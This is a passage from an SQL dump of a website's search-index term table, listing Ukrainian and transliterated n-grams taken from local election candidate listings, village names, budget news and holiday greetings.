1',0,1,1.6333,'о000',1,'*'),(1628463,'ово','ово',0,0,0.2,'о000',1,'*'),(1628464,'ово прізвище','ово прізвище',0,1,1.4,'о000',1,'*'),(1628465,'ово прізвище ім\'я','ово прізвище ім',0,1,1.5667,'о000',1,'*'),(1628466,'оксана олександрівна','оксана олександрівна',0,1,1.6667,'о000',1,'*'),(1628467,'оксана олександрівна політична','оксана олександрівна політична',0,1,2,'о000',1,'*'),(1628468,'олександр васильович політична','олександр васильович політична',0,1,2,'о000',1,'*'),(1628469,'олександр володимирович політична','олександр володимирович політична',0,1,2,'о000',1,'*'),(1628470,'олександрівна','олександрівна',0,0,0.8667,'о000',1,'*'),(1628471,'олександрівна політична','олександрівна політична',0,1,1.7667,'о000',1,'*'),(1628472,'олександрівна політична партія','олександрівна політична партія',0,1,2,'о000',1,'*'),(1628473,'олександрук','олександрук',0,0,0.7333,'о000',1,'*'),(1628474,'олександрук світлана','олександрук світлана',0,1,1.6667,'о000',1,'*'),(1628475,'олександрук світлана миколаївна','олександрук світлана миколаївна',0,1,2,'о000',1,'*'),(1628476,'охорони','охорони',0,0,0.4667,'о000',1,'*'),(1628477,'охорони праці','охорони праці',0,1,1.4333,'о000',1,'*'),(1628478,'охорони праці місце','охорони праці місце',0,1,1.6333,'о000',1,'*'),(1628479,'павлівна','павлівна',0,0,0.5333,'п000',1,'*'),(1628480,'павлівна політична','павлівна політична',0,1,1.6,'п000',1,'*'),(1628481,'павлівна політична партія','павлівна політична партія',0,1,1.8333,'п000',1,'*'),(1628482,'перукар','перукар',0,0,0.4667,'п000',1,'*'),(1628483,'перукар місце','перукар місце',0,1,1.4333,'п000',1,'*'),(1628484,'перукар місце проживання','перукар місце проживання',0,1,1.8,'п000',1,'*'),(1628485,'перукарня','перукарня',0,0,0.6,'п000',1,'*'),(1628486,'перукарня kristina','перукарня kristina',0,1,1.6,'п26235',1,'*'),(1628487,'перукарня kristina перукар','перукарня kristina перукар',0,1,1.8667,'п26235',1,'*'),(1628488,'петрович політична','петрович політична',0,1,1.6,'п000',1,'*'),(1628489,'петрович політична партія','петрович політична партія',0,1,1.8333,'п000',1,'*'),(1628490,'петровський','петровський',0,0,0.7333,'п000',1,'*'),(1628491,'петровський аркадій','петровський аркадій',0,1,1.6333,'п000',1,'*'),(1628492,'петровський аркадій петрович','петровський аркадій петрович',0,1,1.9333,'п000',1,'*'),(1628493,'по батькові висування','по батькові висування',0,1,1.7,'п000',1,'*'),(1628494,'полісся голова','полісся голова',0,1,1.4667,'п000',1,'*'),(1628495,'полісся голова місце','полісся голова місце',0,1,1.6667,'п000',1,'*'),(1628496,'помічник-консультант','помічник-консультант',0,0,1,'п000',1,'*'),(1628497,'помічник-консультант народного','помічник-консультант народного',0,1,2,'п000',1,'*'),(1628498,'помічник-консультант народного депутата','помічник-консультант народного депутата',0,1,2,'п000',1,'*'),(1628499,'посп','посп',0,0,0.2667,'п000',1,'*'),(1628500,'посп скуратівське','посп скуратівське',0,1,1.5667,'п000',1,'*'),(1628501,'посп скуратівське директор','посп скуратівське директор',0,1,1.8667,'п000',1,'*'),(1628502,'правового','правового',0,0,0.6,'п000',1,'*'),(1628503,'правового забезпечення','правового забезпечення',0,1,1.7333,'п000',1,'*'),(1628504,'правового забезпечення місце','правового забезпечення місце',0,1,1.9333,'п000',1,'*'),(1628505,'праці','праці',0,0,0.3333,'п000',1,'*'),(1628506,'праці місце','праці місце',0,1,1.3667,'п000',1,'*'),(1628507,'праці місце проживання','праці місце проживання',0,1,1.7333,'п000',1,'*'),(1628508,'проживання с барвінки','проживання с барвінки',0,1,1.7,'п000',1,'*'),(1628509,'проживання с владівка','проживання с владівка',0,1,1.7,'п000',1,'*'),(1628510,'проживання с головки','проживання с головки',0,1,1.6667,'п000',1,'*'),(1628511,'проживання с загребля','проживання с загребля',0,1,1.7,'п000',1,'*'),(1628512,'проживання с йосипівка','проживання с йосипівка',0,1,1.7333,'п000',1,'*'),(1628513,'проживання с новобратське','проживання с новобратське',0,1,1.8333,'п000',1,'*'),(1628514,'проживання с скурати','проживання с скурати',0,1,1.6667,'п000',1,'*'),(1628515,'проживання с тишів','проживання с тишів',0,1,1.6,'п000',1,'*'),(1628516,'проживання с-ще','проживання с-ще',0,1,1.5,'п000',1,'*'),(1628517,'проживання с-ще чоповичі','проживання с-ще чоповичі',0,1,1.8,'п000',1,'*'),(1628518,'раєць віктор','раєць віктор',0,1,1.4,'р000',1,'*'),(1628519,'раєць віктор володимирович','раєць віктор володимирович',0,1,1.8667,'р000',1,'*'),(1628520,'рада начальник','рада начальник',0,1,1.4667,'р000',1,'*'),(1628521,'рада начальник відділу','рада начальник відділу',0,1,1.7333,'р000',1,'*'),(1628522,'рада секретар','рада секретар',0,1,1.4333,'р000',1,'*'),(1628523,'рада секретар місце','рада секретар місце',0,1,1.6333,'р000',1,'*'),(1628524,'рада спеціаліст','рада спеціаліст',0,1,1.5,'р000',1,'*'),(1628525,'рада спеціаліст відділу','рада спеціаліст відділу',0,1,1.7667,'р000',1,'*'),(1628526,'рада староста','рада староста',0,1,1.4333,'р000',1,'*'),(1628527,'рада староста місце','рада староста місце',0,1,1.6333,'р000',1,'*'),(1628528,'рада україни','рада україни',0,1,1.4,'р000',1,'*'),(1628529,'рада україни помічник-консультант','рада україни помічник-консультант',0,1,2,'р000',1,'*'),(1628530,'романчук','романчук',0,0,0.5333,'р000',1,'*'),(1628531,'романчук олександр','романчук олександр',0,1,1.6,'р000',1,'*'),(1628532,'романчук олександр васильович','романчук олександр васильович',0,1,1.9667,'р000',1,'*'),(1628533,'рустемівна','рустемівна',0,0,0.6667,'р000',1,'*'),(1628534,'рустемівна політична','рустемівна політична',0,1,1.6667,'р000',1,'*'),(1628535,'рустемівна політична партія','рустемівна політична партія',0,1,1.9,'р000',1,'*'),(1628536,'с барвінки','с барвінки',0,1,1.3333,'с000',1,'*'),(1628537,'с барвінки завідуюча','с барвінки завідуюча',0,1,1.6667,'с000',1,'*'),(1628538,'с барвінки малинський','с барвінки малинський',0,1,1.7,'с000',1,'*'),(1628539,'с владівка','с владівка',0,1,1.3333,'с000',1,'*'),(1628540,'с владівка малинський','с владівка малинський',0,1,1.7,'с000',1,'*'),(1628541,'с головки','с головки',0,1,1.3,'с000',1,'*'),(1628542,'с головки малинський','с головки малинський',0,1,1.6667,'с000',1,'*'),(1628543,'с загребля','с загребля',0,1,1.3333,'с000',1,'*'),(1628544,'с загребля малинський','с загребля малинський',0,1,1.7,'с000',1,'*'),(1628545,'с йосипівка','с йосипівка',0,1,1.3667,'с000',1,'*'),(1628546,'с йосипівка малинський','с йосипівка малинський',0,1,1.7333,'с000',1,'*'),(1628547,'с новобратське','с новобратське',0,1,1.4667,'с000',1,'*'),(1628548,'с новобратське малинський','с новобратське малинський',0,1,1.8333,'с000',1,'*'),(1628549,'с скурати','с скурати',0,1,1.3,'с000',1,'*'),(1628550,'с скурати малинський','с скурати малинський',0,1,1.6667,'с000',1,'*'),(1628551,'с тишів','с тишів',0,1,1.2333,'с000',1,'*'),(1628552,'с тишів малинський','с тишів малинський',0,1,1.6,'с000',1,'*'),(1628553,'с-ще','с-ще',0,0,0.2667,'с000',1,'*'),(1628554,'с-ще чоповичі','с-ще чоповичі',0,1,1.4333,'с000',1,'*'),(1628555,'с-ще чоповичі малинський','с-ще чоповичі малинський',0,1,1.8,'с000',1,'*'),(1628556,'сільська рада секретар','сільська рада секретар',0,1,1.7333,'с000',1,'*'),(1628557,'самовисування','самовисування',0,0,0.8667,'с000',1,'*'),(1628558,'самовисування 1','самовисування 1',0,1,1.5,'с000',1,'*'),(1628559,'самовисування 1 4.55','самовисування 1 4.55',0,1,1.6667,'с000',1,'*'),(1628560,'самовисування громадянин','самовисування громадянин',0,1,1.8,'с000',1,'*'),(1628561,'самовисування громадянин україни','самовисування громадянин україни',0,1,2,'с000',1,'*'),(1628562,'самовисування кількість','самовисування кількість',0,1,1.7667,'с000',1,'*'),(1628563,'самовисування кількість обраних','самовисування кількість обраних',0,1,2,'с000',1,'*'),(1628564,'світлана миколаївна','світлана миколаївна',0,1,1.6333,'с000',1,'*'),(1628565,'світлана миколаївна політична','світлана миколаївна політична',0,1,1.9667,'с000',1,'*'),(1628566,'секретар','секретар',0,0,0.5333,'с000',1,'*'),(1628567,'секретар місце','секретар місце',0,1,1.4667,'с000',1,'*'),(1628568,'секретар місце проживання','секретар місце проживання',0,1,1.8333,'с000',1,'*'),(1628569,'селищна','селищна',0,0,0.4667,'с000',1,'*'),(1628570,'селищна рада','селищна рада',0,1,1.4,'с000',1,'*'),(1628571,'селищна рада начальник','селищна рада начальник',0,1,1.7333,'с000',1,'*'),(1628572,'селищна рада секретар','селищна рада секретар',0,1,1.7,'с000',1,'*'),(1628573,'селищна рада спеціаліст','селищна рада спеціаліст',0,1,1.7667,'с000',1,'*'),(1628574,'селищна рада староста','селищна рада староста',0,1,1.7,'с000',1,'*'),(1628575,'сергій миколайович','сергій миколайович',0,1,1.6,'с000',1,'*'),(1628576,'сергій миколайович політична','сергій миколайович політична',0,1,1.9333,'с000',1,'*'),(1628577,'середня безпартійна перукарня','середня безпартійна перукарня',0,1,1.9667,'с000',1,'*'),(1628578,'середня безпартійна фоп','середня безпартійна фоп',0,1,1.7667,'с000',1,'*'),(1628579,'середня спеціальна безпартійний','середня спеціальна безпартійний',0,1,2,'с000',1,'*'),(1628580,'скуратівська','скуратівська',0,0,0.8,'с000',1,'*'),(1628581,'скуратівська сільська','скуратівська сільська',0,1,1.7,'с000',1,'*'),(1628582,'скуратівська сільська рада','скуратівська сільська рада',0,1,1.8667,'с000',1,'*'),(1628583,'скуратівське','скуратівське',0,0,0.8,'с000',1,'*'),(1628584,'скуратівське директор','скуратівське директор',0,1,1.7,'с000',1,'*'),(1628585,'скуратівське директор місце','скуратівське директор місце',0,1,1.9,'с000',1,'*'),(1628586,'скурати','скурати',0,0,0.4667,'с000',1,'*'),(1628587,'скурати малинський','скурати малинський',0,1,1.6,'с000',1,'*'),(1628588,'скурати малинський р-н','скурати малинський р-н',0,1,1.7333,'с000',1,'*'),(1628589,'слава','слава',0,0,0.3333,'с000',1,'*'),(1628590,'слава полісся','слава полісся',0,1,1.4333,'с000',1,'*'),(1628591,'слава полісся голова','слава полісся голова',0,1,1.6667,'с000',1,'*'),(1628592,'слуга народу 2','слуга народу 2',0,1,1.4667,'с000',1,'*'),(1628593,'слуга народу громадянин','слуга народу громадянин',0,1,1.7667,'с000',1,'*'),(1628594,'слуга народу громадянка','слуга народу громадянка',0,1,1.7667,'с000',1,'*'),(1628595,'солідарність 2','солідарність 2',0,1,1.4667,'с000',1,'*'),(1628596,'солідарність 2 9.09','солідарність 2 9.09',0,1,1.6333,'с000',1,'*'),(1628597,'солідарність громадянка','солідарність громадянка',0,1,1.7667,'с000',1,'*'),(1628598,'солідарність громадянка україни','солідарність громадянка україни',0,1,2,'с000',1,'*'),(1628599,'спеціаліст відділу кадрового','спеціаліст відділу кадрового',0,1,1.9333,'с000',1,'*'),(1628600,'спеціальна безпартійна головківська','спеціальна безпартійна головківська',0,1,2,'с000',1,'*'),(1628601,'спеціальна безпартійна скуратівська','спеціальна безпартійна скуратівська',0,1,2,'с000',1,'*'),(1628602,'спеціальна безпартійна фоп','спеціальна безпартійна фоп',0,1,1.8667,'с000',1,'*'),(1628603,'спеціальна безпартійна чоповицька','спеціальна безпартійна чоповицька',0,1,2,'с000',1,'*'),(1628604,'спеціальна безпартійний','спеціальна безпартійний',0,1,1.7667,'с000',1,'*'),(1628605,'спеціальна безпартійний дп','спеціальна безпартійний дп',0,1,1.8667,'с000',1,'*'),(1628606,'спеціальна безпартійний пенсіонер','спеціальна безпартійний пенсіонер',0,1,2,'с000',1,'*'),(1628607,'спеціальна безпартійний тов','спеціальна безпартійний тов',0,1,1.9,'с000',1,'*'),(1628608,'староста місце','староста місце',0,1,1.4667,'с000',1,'*'),(1628609,'староста місце проживання','староста місце проживання',0,1,1.8333,'с000',1,'*'),(1628610,'т','т',0,0,0.0667,'т000',1,'*'),(1628611,'т і','т і',0,1,1.1,'т000',1,'*'),(1628612,'т і місце','т і місце',0,1,1.3,'т000',1,'*'),(1628613,'т м','т м',0,1,1.1,'т000',1,'*'),(1628614,'т м місце','т м місце',0,1,1.3,'т000',1,'*'),(1628615,'тетяна','тетяна',0,0,0.4,'т000',1,'*'),(1628616,'тетяна іванівна','тетяна іванівна',0,1,1.5,'т000',1,'*'),(1628617,'тетяна іванівна політична','тетяна іванівна політична',0,1,1.8333,'т000',1,'*'),(1628618,'тетяна іванвна','тетяна іванвна',0,1,1.4667,'т000',1,'*'),(1628619,'тетяна іванвна політична','тетяна іванвна політична',0,1,1.8,'т000',1,'*'),(1628620,'тишів','тишів',0,0,0.3333,'т000',1,'*'),(1628621,'тишів малинський','тишів малинський',0,1,1.5333,'т000',1,'*'),(1628622,'тишів малинський р-н','тишів малинський р-н',0,1,1.6667,'т000',1,'*'),(1628623,'тов фнк','тов фнк',0,1,1.2333,'т000',1,'*'),(1628624,'тов фнк ельфа','тов фнк ельфа',0,1,1.4333,'т000',1,'*'),(1628625,'україни грищенко','україни грищенко',0,1,1.5333,'у000',1,'*'),(1628626,'україни грищенко т','україни грищенко т',0,1,1.6,'у000',1,'*'),(1628627,'україни народився 01.01.1974','україни народився 01.01.1974',0,1,1.9333,'у000',1,'*'),(1628628,'україни народився 01.01.1977','україни народився 01.01.1977',0,1,1.9333,'у000',1,'*'),(1628629,'україни народився 04.01.1956','україни народився 04.01.1956',0,1,1.9333,'у000',1,'*'),(1628630,'україни народився 05.04.1989','україни народився 05.04.1989',0,1,1.9333,'у000',1,'*'),(1628631,'україни народився 10.05.1983','україни народився 10.05.1983',0,1,1.9333,'у000',1,'*'),(1628632,'україни народився 14.03.1979','україни народився 14.03.1979',0,1,1.9333,'у000',1,'*'),(1628633,'україни народився 18.09.1968','україни народився 18.09.1968',0,1,1.9333,'у000',1,'*'),(1628634,'україни народився 20.07.1967','україни народився 20.07.1967',0,1,1.9333,'у000',1,'*'),(1628635,'україни народився 22.11.1982','україни народився 22.11.1982',0,1,1.9333,'у000',1,'*'),(1628636,'україни народився 30.04.1960','україни народився 30.04.1960',0,1,1.9333,'у000',1,'*'),(1628637,'україни народилася 02.10.1980','україни народилася 02.10.1980',0,1,1.9667,'у000',1,'*'),(1628638,'україни народилася 02.12.1993','україни народилася 02.12.1993',0,1,1.9667,'у000',1,'*'),(1628639,'україни народилася 05.11.1971','україни народилася 05.11.1971',0,1,1.9667,'у000',1,'*'),(1628640,'україни народилася 08.04.1973','україни народилася 08.04.1973',0,1,1.9667,'у000',1,'*'),(1628641,'україни народилася 10.10.1968','україни народилася 10.10.1968',0,1,1.9667,'у000',1,'*'),(1628642,'україни народилася 13.06.1963','україни народилася 13.06.1963',0,1,1.9667,'у000',1,'*'),(1628643,'україни народилася 20.07.1968','україни народилася 20.07.1968',0,1,1.9667,'у000',1,'*'),(1628644,'україни народилася 21.06.1962','україни народилася 21.06.1962',0,1,1.9667,'у000',1,'*'),(1628645,'україни народилася 24.06.1994','україни народилася 24.06.1994',0,1,1.9667,'у000',1,'*'),(1628646,'україни народилася 25.09.1978','україни народилася 25.09.1978',0,1,1.9667,'у000',1,'*'),(1628647,'україни народилася 30.07.1970','україни народилася 30.07.1970',0,1,1.9667,'у000',1,'*'),(1628648,'україни помічник-консультант','україни помічник-консультант',0,1,1.9333,'у000',1,'*'),(1628649,'україни помічник-консультант народного','україни помічник-консультант народного',0,1,2,'у000',1,'*'),(1628650,'філоненко михайло','філоненко михайло',0,1,1.5667,'ф000',1,'*'),(1628651,'філоненко михайло миколайович','філоненко михайло миколайович',0,1,1.9667,'ф000',1,'*'),(1628652,'філоненко о','філоненко о',0,1,1.3667,'ф000',1,'*'),(1628653,'філоненко о о','філоненко о о',0,1,1.4333,'ф000',1,'*'),(1628654,'філоненко оксана','філоненко оксана',0,1,1.5333,'ф000',1,'*'),(1628655,'філоненко оксана олександрівна','філоненко оксана олександрівна',0,1,2,'ф000',1,'*'),(1628656,'фермерське','фермерське',0,0,0.6667,'ф000',1,'*'),(1628657,'фермерське господарство','фермерське господарство',0,1,1.7667,'ф000',1,'*'),(1628658,'фермерське господарство слава','фермерське господарство слава',0,1,1.9667,'ф000',1,'*'),(1628659,'фещенко','фещенко',0,0,0.4667,'ф000',1,'*'),(1628660,'фещенко михайло','фещенко михайло',0,1,1.5,'ф000',1,'*'),(1628661,'фещенко михайло іванович','фещенко михайло іванович',0,1,1.8,'ф000',1,'*'),(1628662,'фнк','фнк',0,0,0.2,'ф000',1,'*'),(1628663,'фнк ельфа','фнк ельфа',0,1,1.3,'ф000',1,'*'),(1628664,'фнк ельфа інженер','фнк ельфа інженер',0,1,1.5667,'ф000',1,'*'),(1628665,'фоп майстренко','фоп майстренко',0,1,1.4667,'ф000',1,'*'),(1628666,'фоп майстренко т','фоп майстренко т',0,1,1.5333,'ф000',1,'*'),(1628667,'фоп філоненко','фоп філоненко',0,1,1.4333,'ф000',1,'*'),(1628668,'фоп філоненко о','фоп філоненко о',0,1,1.5,'ф000',1,'*'),(1628669,'харченко','харченко',0,0,0.5333,'х000',1,'*'),(1628670,'харченко сергій','харченко сергій',0,1,1.5,'х000',1,'*'),(1628671,'харченко сергій миколайович','харченко сергій миколайович',0,1,1.9,'х000',1,'*'),(1628672,'центр','центр',0,0,0.3333,'ц000',1,'*'),(1628673,'центр медико-санітарної','центр медико-санітарної',0,1,1.7667,'ц000',1,'*'),(1628674,'центр медико-санітарної допомоги','центр медико-санітарної допомоги',0,1,2,'ц000',1,'*'),(1628675,'чоповицька','чоповицька',0,0,0.6667,'ч000',1,'*'),(1628676,'чоповицька селищна','чоповицька селищна',0,1,1.6,'ч000',1,'*'),(1628677,'чоповицька селищна рада','чоповицька селищна рада',0,1,1.7667,'ч000',1,'*'),(1628678,'чоповицький','чоповицький',0,0,0.7333,'ч000',1,'*'),(1628679,'чоповицький центр','чоповицький центр',0,1,1.5667,'ч000',1,'*'),(1628680,'чоповицький центр медико-санітарної','чоповицький центр медико-санітарної',0,1,2,'ч000',1,'*'),(1628681,'чоповицької','чоповицької',0,0,0.7333,'ч000',1,'*'),(1628682,'чоповицької селищної','чоповицької селищної',0,1,1.6667,'ч000',1,'*'),(1628683,'чоповицької селищної ради','чоповицької селищної ради',0,1,1.8333,'ч000',1,'*'),(1628684,'чоповичі','чоповичі',0,0,0.5333,'ч000',1,'*'),(1628685,'чоповичі малинський','чоповичі малинський',0,1,1.6333,'ч000',1,'*'),(1628686,'чоповичі малинський р-н','чоповичі малинський р-н',0,1,1.7667,'ч000',1,'*'),(1628687,'шоботенко','шоботенко',0,0,0.6,'ш000',1,'*'),(1628688,'шоботенко олександр','шоботенко олександр',0,1,1.6333,'ш000',1,'*'),(1628689,'шоботенко олександр володимирович','шоботенко олександр володимирович',0,1,2,'ш000',1,'*'),(1628690,'шпакович','шпакович',0,0,0.5333,'ш000',1,'*'),(1628691,'шпакович валентина','шпакович валентина',0,1,1.6,'ш000',1,'*'),(1628692,'шпакович валентина василівна','шпакович валентина василівна',0,1,1.9333,'ш000',1,'*'),(1628693,'шпакович тетяна','шпакович тетяна',0,1,1.5,'ш000',1,'*'),(1628694,'шпакович тетяна іванвна','шпакович тетяна іванвна',0,1,1.7667,'ш000',1,'*'),(1628695,'якої висунула кандидата','якої висунула кандидата',0,1,1.7667,'я000',1,'*'),(1628696,'ярошенко','ярошенко',0,0,0.5333,'я000',1,'*'),(1628697,'ярошенко в\'ячеслав','ярошенко в',0,1,1.6,'я000',1,'*'),(1628698,'ярошенко в\'ячеслав петрович','ярошенко в петрович',0,1,1.9,'я000',1,'*'),(1629025,'11 misyatsiv','11 misyatsiv',0,1,1.4,'M2321',1,'*'),(1629026,'11 misyatsiv 2020','11 misyatsiv 2020',0,1,1.5667,'M2321',1,'*'),(1629027,'11 місяців','11 місяців',0,1,1.3333,'м000',1,'*'),(1629028,'11 місяців 2020','11 місяців 2020',0,1,1.5,'м000',1,'*'),(1629029,'2491','2491',0,0,0.4,'',1,'*'),(1629030,'istorichni','istorichni',0,0,0.6667,'I23625',1,'*'),(1629031,'istorichni materiali','istorichni materiali',0,1,1.6667,'I23625364',1,'*'),(1629032,'istorichni materiali shchodo','istorichni materiali shchodo',0,1,1.9333,'I2362536423',1,'*'),(1629033,'materiali shchodo','materiali shchodo',0,1,1.5667,'M36423',1,'*'),(1629034,'materiali shchodo vikonannya','materiali shchodo vikonannya',0,1,1.9333,'M36423125',1,'*'),(1629035,'ostanni vzhe','ostanni vzhe',0,1,1.4,'O23512',1,'*'),(1629036,'ostanni vzhe istorichni','ostanni vzhe istorichni',0,1,1.7667,'O235123625',1,'*'),(1629037,'otg za 11','otg za 11',0,1,1.3,'O320',1,'*'),(1629038,'shchodo','shchodo',0,0,0.4667,'S300',1,'*'),(1629039,'shchodo vikonannya','shchodo vikonannya',0,1,1.6,'S3125',1,'*'),(1629040,'shchodo vikonannya dokhidnoji','shchodo vikonannya dokhidnoji',0,1,1.9667,'S312532352',1,'*'),(1629041,'vzhe','vzhe',0,0,0.2667,'V200',2,'*'),(1629042,'vzhe istorichni','vzhe istorichni',0,1,1.5,'V23625',1,'*'),(1629043,'vzhe istorichni materiali','vzhe istorichni materiali',0,1,1.8333,'V23625364',1,'*'),(1629044,'za 11','za 11',0,1,1.1667,'Z000',1,'*'),(1629045,'za 11 misyatsiv','za 11 misyatsiv',0,1,1.5,'Z52321',1,'*'),(1629046,'історичні','історичні',0,0,0.6,'і000',1,'*'),(1629047,'історичні матеріали','історичні матеріали',0,1,1.6333,'і000',1,'*'),(1629048,'історичні матеріали щодо','історичні матеріали щодо',0,1,1.8,'і000',1,'*'),(1629049,'вже','вже',0,0,0.2,'в000',4,'*'),(1629050,'вже історичні','вже історичні',0,1,1.4333,'в000',1,'*'),(1629051,'вже історичні матеріали','вже історичні матеріали',0,1,1.7667,'в000',1,'*'),(1629052,'даними департамента','даними департамента',0,1,1.6333,'д000',3,'*'),(1629053,'даними департамента фінансів','даними департамента фінансів',0,1,1.9333,'д000',3,'*'),(1629054,'департамента','департамента',0,0,0.8,'д000',3,'*'),(1629055,'департамента фінансів','департамента фінансів',0,1,1.7,'д000',3,'*'),(1629056,'департамента фінансів житомирської','департамента фінансів житомирської',0,1,2,'д000',3,'*'),(1629057,'за 11','за 11',0,1,1.1667,'з000',1,'*'),(1629058,'за 11 місяців','за 11 місяців',0,1,1.4333,'з000',1,'*'),(1629059,'за даними департамента','за даними департамента',0,1,1.7333,'з000',3,'*'),(1629060,'матеріали щодо','матеріали щодо',0,1,1.4667,'м000',1,'*'),(1629061,'матеріали щодо виконання','матеріали щодо виконання',0,1,1.8,'м000',1,'*'),(1629062,'останні вже','останні вже',0,1,1.3667,'о000',1,'*'),(1629063,'останні вже історичні','останні вже історичні',0,1,1.7,'о000',1,'*'),(1629064,'отг за 11','отг за 11',0,1,1.3,'о000',1,'*'),(1629065,'щодо виконання','щодо виконання',0,1,1.4667,'щ000',1,'*'),(1629066,'щодо виконання дохідної','щодо виконання дохідної',0,1,1.7667,'щ000',1,'*'),(1629096,'viber','viber',0,0,0.3333,'V600',1,'*'),(1629097,'viber 0508320922','viber 0508320922',0,1,1.5333,'V600',1,'*'),(1629098,'дзвоніть','дзвоніть',0,0,0.5333,'д000',4,'*'),(1629119,'129','129',0,0,0.3,'',1,'*'),(1629120,'porady','porady',0,0,0.4,'P630',2,'*'),(1629121,'rizni','rizni',0,0,0.3333,'R250',2,'*'),(1629122,'rizni porady','rizni porady',0,1,1.4,'R25163',2,'*'),(1629123,'контакти','контакти',0,0,0.5333,'к000',1,'*'),(1629126,'21 grudnya','21 grudnya',0,1,1.3333,'G635',1,'*'),(1629127,'21 grudnya 2020','21 grudnya 2020',0,1,1.5,'G635',1,'*'),(1629128,'21 грудня','21 грудня',0,1,1.3,'г000',1,'*'),(1629129,'21 грудня 2020','21 грудня 2020',0,1,1.4667,'г000',1,'*'),(1629130,'2492','2492',0,0,0.4,'',1,'*'),(1629131,'grudnya','grudnya',0,0,0.4667,'G635',1,'*'),(1629132,'grudnya 2020','grudnya 2020',0,1,1.4,'G635',1,'*'),(1629133,'грудня 2020','грудня 2020',0,1,1.3667,'г000',1,'*'),(1629203,'2021','2021',0,0,0.4,'',12,'*'),(1629204,'2021 rokom','2021 rokom',0,1,1.3333,'R250',1,'*'),(1629205,'2021 роком','2021 роком',0,1,1.3333,'р000',1,'*'),(1629206,'2493','2493',0,0,0.4,'',1,'*'),(1629207,'novim','novim',0,0,0.3333,'N150',1,'*'),(1629208,'novim 2021','novim 2021',0,1,1.3333,'N150',1,'*'),(1629209,'novim 2021 rokom','novim 2021 rokom',0,1,1.5333,'N15625',1,'*'),(1629210,'rokom','rokom',0,0,0.3333,'R250',1,'*'),(1629211,'z novim','z novim',0,1,1.2333,'Z515',1,'*'),(1629212,'z novim 2021','z novim 2021',0,1,1.4,'Z515',1,'*'),(1629213,'з новим','з новим',0,1,1.2333,'з000',1,'*'),(1629214,'з новим 2021','з новим 2021',0,1,1.4,'з000',1,'*'),(1629215,'новим','новим',0,0,0.3333,'н000',1,'*'),(1629216,'новим 2021','новим 2021',0,1,1.3333,'н000',1,'*'),(1629217,'новим 2021 роком','новим 2021 роком',0,1,1.5333,'н000',1,'*'),(1629218,'роком','роком',0,0,0.3333,'р000',1,'*'),(1629234,'136','136',0,0,0.3,'',1,'*'),(1629235,'dutyshi','dutyshi',0,0,0.4667,'D200',1,'*'),(1629236,'pomeranski','pomeranski',0,0,0.6667,'P5652',1,'*'),(1629237,'pomeranski dutyshi','pomeranski dutyshi',0,1,1.6,'P565232',1,'*'),(1629238,'дутиші','дутиші',0,0,0.4,'д000',1,'*'),(1629239,'померанські','померанські',0,0,0.7333,'п000',1,'*'),(1629240,'померанські дутиші','померанські дутиші',0,1,1.6,'п000',1,'*'),(1629272,'2494','2494',0,0,0.4,'',1,'*'),(1629273,'novomu','novomu',0,0,0.4,'N150',1,'*'),(1629274,'novomu rotsi','novomu rotsi',0,1,1.4,'N15632',1,'*'),(1629275,'rotsi','rotsi',0,0,0.3333,'R320',1,'*'),(1629276,'snidanok','snidanok',0,0,0.5333,'S5352',4,'*'),(1629277,'snidanok v','snidanok v',0,1,1.3333,'S53521',1,'*'),(1629278,'snidanok v novomu','snidanok v novomu',0,1,1.5667,'S53521515',1,'*'),(1629279,'v novomu','v novomu',0,1,1.2667,'V515',1,'*'),(1629280,'v novomu rotsi','v novomu rotsi',0,1,1.4667,'V515632',1,'*'),(1629281,'в новому','в новому',0,1,1.2667,'в000',1,'*'),(1629282,'в новому році','в новому році',0,1,1.4333,'в000',1,'*'),(1629283,'новому','новому',0,0,0.4,'н000',1,'*'),(1629284,'новому році','новому році',0,1,1.3667,'н000',1,'*'),(1629285,'сніданок','сніданок',0,0,0.5333,'с000',4,'*'),(1629286,'сніданок в','сніданок в',0,1,1.3333,'с000',1,'*'),(1629287,'сніданок в новому','сніданок в новому',0,1,1.5667,'с000',1,'*'),(1629333,'2495','2495',0,0,0.4,'',1,'*'),(1629334,'rizdvyanikh','rizdvyanikh',0,0,0.7333,'R23152',1,'*'),(1629335,'rizdvyanikh svyat','rizdvyanikh svyat',0,1,1.5667,'R2315213',1,'*'),(1629336,'svyat','svyat',0,0,0.3333,'S130',2,'*'),(1629337,'veselikh','veselikh',0,0,0.5333,'V242',1,'*'),(1629338,'veselikh rizdvyanikh','veselikh rizdvyanikh',0,1,1.6667,'V242623152',1,'*'),(1629339,'veselikh rizdvyanikh svyat','veselikh rizdvyanikh svyat',0,1,1.8667,'V24262315213',1,'*'),(1629340,'різдвяних','різдвяних',0,0,0.6,'р000',1,'*'),(1629341,'різдвяних свят','різдвяних свят',0,1,1.4667,'р000',1,'*'),(1629342,'радісних','радісних',0,0,0.5333,'р000',1,'*'),(1629343,'радісних різдвяних','радісних різдвяних',0,1,1.6,'р000',1,'*'),(1629344,'радісних різдвяних свят','радісних різдвяних свят',0,1,1.7667,'р000',1,'*'),(1629348,'12 страв','12 страв',0,1,1.2667,'с000',1,'*'),(1629349,'12 страв та','12 страв та',0,1,1.3667,'с000',1,'*'),(1629350,'2496','2496',0,0,0.4,'',1,'*'),(1629351,'buti','buti',0,0,0.2667,'B300',1,'*'),(1629352,'buti na','buti na',0,1,1.2333,'B350',1,'*'),(1629353,'buti na stoli','buti na stoli',0,1,1.4333,'B35234',1,'*'),(1629354,'na stoli','na stoli',0,1,1.2667,'N234',1,'*'),(1629355,'na stoli na','na stoli na',0,1,1.3667,'N2345',1,'*'),(1629356,'na svyat','na svyat',0,1,1.2667,'N213',1,'*'),(1629357,'na svyat vechir','na svyat vechir',0,1,1.5,'N213126',1,'*'),(1629358,'povinno','povinno',0,0,0.4667,'P500',1,'*'),(1629359,'povinno buti','povinno buti',0,1,1.4,'P513',1,'*'),(1629360,'povinno buti na','povinno buti na',0,1,1.5,'P5135',1,'*'),(1629361,'shcho povinno','shcho povinno',0,1,1.4333,'S150',1,'*'),(1629362,'shcho povinno buti','shcho povinno buti',0,1,1.6,'S1513',1,'*'),(1629363,'stoli','stoli',0,0,0.3333,'S340',1,'*'),(1629364,'stoli na','stoli na',0,1,1.2667,'S345',1,'*'),(1629365,'stoli na svyat','stoli na svyat',0,1,1.4667,'S345213',1,'*'),(1629366,'svyat vechir','svyat vechir',0,1,1.4,'S13126',1,'*'),(1629367,'vechir','vechir',0,0,0.4,'V260',1,'*'),(1629368,'єднання','єднання',0,0,0.4667,'є000',1,'*'),(1629369,'єднання з','єднання з',0,1,1.3,'є000',1,'*'),(1629370,'єднання з богом','єднання з 